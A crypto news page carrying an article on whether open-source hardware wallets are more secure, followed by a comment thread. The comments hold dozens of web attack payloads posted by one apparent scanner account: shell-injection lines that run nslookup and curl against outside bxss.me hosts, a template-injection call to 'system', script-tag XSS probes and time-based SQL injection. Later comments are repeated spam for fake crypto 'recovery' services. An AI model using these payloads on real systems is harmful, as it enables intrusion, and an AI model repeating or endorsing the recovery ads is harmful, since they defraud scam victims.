Русский
EnglishCryptocurrencies:
9544 /
Markets: 113022
Market Cap: $ 3 741 613 272 114 /
24h Vol: $ 204 594 956 552 /
BTC
Dominance: 59.59388436323%
News
Open source: Buzzword or real security for crypto wallets?
Open-sourcing crypto wallet designs offers some benefits, but there are trade-offs as well.
Last month, hardware crypto wallet manufacturer Ledger announced its “Ledger Recover” program designed to allow customers to back up their seed phrases to the cloud and link it with their real-world identity.
The announcement was met with heavy pushback from the crypto community, as many saw it as opposing the ideals of blockchain security and the decade-old mantra of keeping custody over one’s own keys.
Ledger responded swiftly, assuring customers that their seed phrases were safe and that the Ledger Recover program was opt-in. But the entire saga has led to a growing demand for open-source hardware wallets, which could enable the community to rule out any hardware or software backdoors.
Just a week later, Ledger announced that it was accelerating its open-source roadmap. But what does an open-source hardware wallet mean? What are the benefits? And crucially, are they actually securer than their closed-source counterparts?
What your hardware wallet isn’t
First, it’ll help to clear up some misconceptions surrounding hardware wallets.
Your wallet doesn't store crypto.
A lot of people think hardware wallets are used to store cryptocurrencies, but in reality, they’re used to store your private keys. All cryptocurrencies exist on the blockchain, and your private keys prove you own your tokens. This is why it’s important to keep your private key, well, private.
Your spare phone isn't a hardware wallet.
Hardware wallet manufacturing is complicated — and for good reason. People use these devices to secure millions of dollars worth of digital assets, and ensuring the safety of customer funds is crucial to building and maintaining a successful hardware wallet brand.
For this reason, various hardware wallet components are typically proprietary, meaning they cannot be purchased or inspected outside of buying a device and tearing it down. Some wallets even have built-in tamper protection to prevent this. Phones use far more accessible parts, making it a lot easier for an attacker to study and break.
Hardware wallets are not %100 secure
No device or software is completely invulnerable to attack. Accidentally interacting with a malicious smart contract can be catastrophic, and even the most secure wallet can’t protect you from rug pulls or phishing attacks. Hardware wallets are not digital bank vaults — they’re more like keys to a secure public lockbox. They’re a tool to help you store and access your assets securely and are only ever as safe as you are.
Will going open-source help?
If wallets were built with publicly available source code, mass individual audits could prevent malicious actors from getting their way — or at least that’s the claim. But manufacturing hardware wallets requires a lot more trust than one may think, and not just for the manufacturer.
Other businesses in the supply chain have reasonable opportunities to insert their own backdoors, and these devices have complex supply chains. Most hardware wallet companies rely on contract manufacturers, which tend to rely on supply chains originating in China.
Recent: Bitcoin 2023 in Miami comes to grips with ‘shitcoins on Bitcoin’
Another supposed advantage of open-source hardware wallets is increased compatibility and greater community involvement in development. However, making code publicly available makes it easier for hackers to scour it for vulnerabilities. And since the wallet would be made using publicly available components, it would be easier for scammers to create fake wallets that can steal your funds.
Nicolas Bacca, co-founder and vice president of Innovation Lab at Ledger, told Cointelegraph that the biggest challenge facing open-source hardware wallets is creating a way for users to easily verify whether their device is genuine with strong guarantees. Most reputable manufacturers allow you to check the device serial number on their website to confirm its legitimacy. Would you trust every business in an open-source hardware wallet’s supply chain?
“It’s important to remember that an open-source hardware wallet will almost always rely on closed-source components,” said Bacca. “The only way to really know how secure it is is to try to break it and reverse engineer it.” With closed-source wallets, this isn’t possible.
“Until now no wallet has ever released firmware with a proven backdoor. If the firmware is open, it is scrutinized around the world. In closed-source wallets, that is never possible,” Vipul Saini, co-founder and chief technology officer of hardware wallet firm Cypherock, told Cointelegraph.
He believes that operations involving the generation and utilization of private keys should be made open-source. “That is where major backdoors, like kleptographic attacks and predictive random numbers, can be easily established,” he said.
In April 2022, a white hat hacker from Ledger’s security team caught a vulnerability similar to a backdoor in the seed generation of Trust Wallet, a Binance-owned open-source software wallet. With off-the-shelf chips, any party in the supply chain could modify the code that loads the bootloader, a critical part of ensuring the customer receives a device with genuine firmware.
This wouldn’t be noticed by code auditors since the backdoor could be inserted, while the code is being loaded onto the device.
“Given this limitation, it’s not possible to build a robust chain of trust for open-source hardware wallets, which considerably limits their distribution and safe use by the largest number of users,” he added. “The ‘many eyes’ paradigm doesn’t really work for security code, with the best example of this being the Heartbleed OpenSSL exploit.”
Are open-source wallets the future?
As centralized exchanges continue their efforts to rebuild trust with the crypto community, people are being encouraged to store their coins in hardware wallets more than ever before. If the open-source movement gains more traction, the ability to verify that your device hasn’t been tampered with is critical, and this isn’t easy without an intermediary.
One solution is encouraging open-source hardware wallet producers to comply with the Open Source Hardware Association (OSHWA) criteria and obtain CERN’s Open Hardware Licence. But as examples like the 2008 global financial crisis showed, licenses and certifications can only guarantee so much.
“OSHWA helps provide proper labels, define and certify what is open hardware,” said Bacca, stating that it doesn’t help secure against attacks, but it’s useful to avoid dubious marketing claims. Bacca also mentioned a few existing vendors that claimed to be open-source without having an open-source license, or with proprietary code mixed in with their open-source codebase.
Recent: How security, education and regulation can mitigate rising crypto scams
From unclear incentive structures to restricted testing in predefined circumstances, it’s important to address the limitations of certification organizations. The movement could also lead to a stampede of companies capitalizing on the “open-source” buzzword, hiding their proprietary elements behind sub-standard certifications.
Closed-source manufacturers use proprietary chips to enforce strong root-of-trust guarantees, but what would a pure open-source wallet employ? The reality of the market is that security evaluations are more nuanced than a simple dichotomy of open source vs. closed source.
At the end of the day, consumers want the securest option that requires them to trust the least number of people.
-
09.10.25 08:08
pHqghUme
expr 9000227416 - 917575
-
09.10.25 08:08
pHqghUme
(nslookup -q=cname hitrirljyvgim44c57.bxss.me||curl hitrirljyvgim44c57.bxss.me))
-
09.10.25 08:08
pHqghUme
$(nslookup -q=cname hitnaasjhmbqf44699.bxss.me||curl hitnaasjhmbqf44699.bxss.me)
-
09.10.25 08:08
pHqghUme
&nslookup -q=cname hitdjgcbtalqm528b9.bxss.me&'\"`0&nslookup -q=cname hitdjgcbtalqm528b9.bxss.me&`'
-
09.10.25 08:08
pHqghUme
&(nslookup -q=cname hitgrfzhgegxdb7bdf.bxss.me||curl hitgrfzhgegxdb7bdf.bxss.me)&'\"`0&(nslookup -q=cname hitgrfzhgegxdb7bdf.bxss.me||curl hitgrfzhgegxdb7bdf.bxss.me)&`'
-
09.10.25 08:08
pHqghUme
|(nslookup -q=cname hitfmymffseet6e8b2.bxss.me||curl hitfmymffseet6e8b2.bxss.me)
-
09.10.25 08:08
pHqghUme
`(nslookup -q=cname hitohduurqhba06a59.bxss.me||curl hitohduurqhba06a59.bxss.me)`
-
09.10.25 08:08
pHqghUme
;(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)|(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)&(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)
-
09.10.25 08:08
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:08
pHqghUme
|(nslookup${IFS}-q${IFS}cname${IFS}hitanwkhusxwr37069.bxss.me||curl${IFS}hitanwkhusxwr37069.bxss.me)
-
09.10.25 08:09
pHqghUme
&(nslookup${IFS}-q${IFS}cname${IFS}hitochckpfbtw00d29.bxss.me||curl${IFS}hitochckpfbtw00d29.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitochckpfbtw00d29.bxss.me||curl${IFS}hitochckpfbtw00d29.bxss.me)&`'
-
09.10.25 08:09
pHqghUme
can I ask you a question please?
-
09.10.25 08:09
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:09
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:09
pHqghUme
e
-
09.10.25 08:11
pHqghUme
e
-
09.10.25 08:11
pHqghUme
e
-
09.10.25 08:11
pHqghUme
e
-
09.10.25 08:11
pHqghUme
can I ask you a question please?
-
09.10.25 08:12
pHqghUme
can I ask you a question please?
-
09.10.25 08:12
pHqghUme
can I ask you a question please?
-
09.10.25 08:12
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:13
pHqghUme
can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>
-
09.10.25 08:13
pHqghUme
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}
-
09.10.25 08:13
pHqghUme
'"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>
-
09.10.25 08:13
pHqghUme
can I ask you a question please?9425407
-
09.10.25 08:13
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:14
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:16
pHqghUme
e
-
09.10.25 08:17
pHqghUme
e
-
09.10.25 08:17
pHqghUme
e
-
09.10.25 08:17
pHqghUme
"+response.write(9043995*9352716)+"
-
09.10.25 08:17
pHqghUme
can I ask you a question please?
-
09.10.25 08:17
pHqghUme
can I ask you a question please?
-
09.10.25 08:17
pHqghUme
can I ask you a question please?
-
09.10.25 08:18
pHqghUme
can I ask you a question please?
-
09.10.25 08:18
pHqghUme
$(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)
-
09.10.25 08:18
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:18
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:18
pHqghUme
|(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)
-
09.10.25 08:18
pHqghUme
|(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)
-
09.10.25 08:18
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:19
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:20
pHqghUme
e
-
09.10.25 08:20
pHqghUme
e
-
09.10.25 08:21
pHqghUme
e
-
09.10.25 08:21
pHqghUme
e
-
09.10.25 08:21
pHqghUme
can I ask you a question please?
-
09.10.25 08:22
pHqghUme
can I ask you a question please?
-
09.10.25 08:22
pHqghUme
can I ask you a question please?
-
09.10.25 08:22
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:22
pHqghUme
if(now()=sysdate(),sleep(15),0)
-
09.10.25 08:22
pHqghUme
can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
09.10.25 08:23
pHqghUme
can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
09.10.25 08:23
pHqghUme
can I ask you a question please?
-
09.10.25 08:23
pHqghUme
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
09.10.25 08:24
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:24
pHqghUme
e
-
09.10.25 08:24
pHqghUme
can I ask you a question please?-1 waitfor delay '0:0:15' --
-
09.10.25 08:25
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:25
pHqghUme
e
-
09.10.25 08:25
pHqghUme
e
-
09.10.25 08:25
pHqghUme
e
-
09.10.25 08:25
pHqghUme
can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --
-
09.10.25 08:26
pHqghUme
can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--
-
09.10.25 08:26
pHqghUme
e
-
09.10.25 08:27
pHqghUme
can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--
-
09.10.25 08:27
pHqghUme
can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--
-
09.10.25 08:28
pHqghUme
can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
09.10.25 08:28
pHqghUme
can I ask you a question please?'"
-
09.10.25 08:28
pHqghUme
can I ask you a question please?
-
09.10.25 08:28
pHqghUme
@@olQP6
-
09.10.25 08:28
pHqghUme
(select 198766*667891 from DUAL)
-
09.10.25 08:28
pHqghUme
(select 198766*667891)
-
09.10.25 08:30
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:33
pHqghUme
can I ask you a question please?
-
09.10.25 08:34
pHqghUme
can I ask you a question please?
-
09.10.25 08:34
pHqghUme
if(now()=sysdate(),sleep(15),0)
-
09.10.25 08:35
pHqghUme
e
-
09.10.25 08:36
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:36
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:37
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:37
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:37
pHqghUme
e
-
09.10.25 08:37
pHqghUme
e
-
09.10.25 08:40
pHqghUme
can I ask you a question please?
-
09.10.25 08:40
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:41
pHqghUme
e
-
09.10.25 08:41
pHqghUme
can I ask you a question please?
-
09.10.25 08:42
pHqghUme
can I ask you a question please?
-
09.10.25 08:42
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:42
pHqghUme
e
-
09.10.25 11:05
marcushenderson624
Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
-
09.10.25 11:05
marcushenderson624
Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
-
09.10.25 11:05
marcushenderson624
Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
-
09.10.25 11:05
marcushenderson624
Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
-
11.10.25 04:41
luciajessy3
Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…
-
11.10.25 10:44
Tonerdomark
A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.
-
01:12
harristhomas7376
"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
-
01:12
harristhomas7376
"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
To join the Chat, you need a free pro-blockchain.com account.
Enter
Registration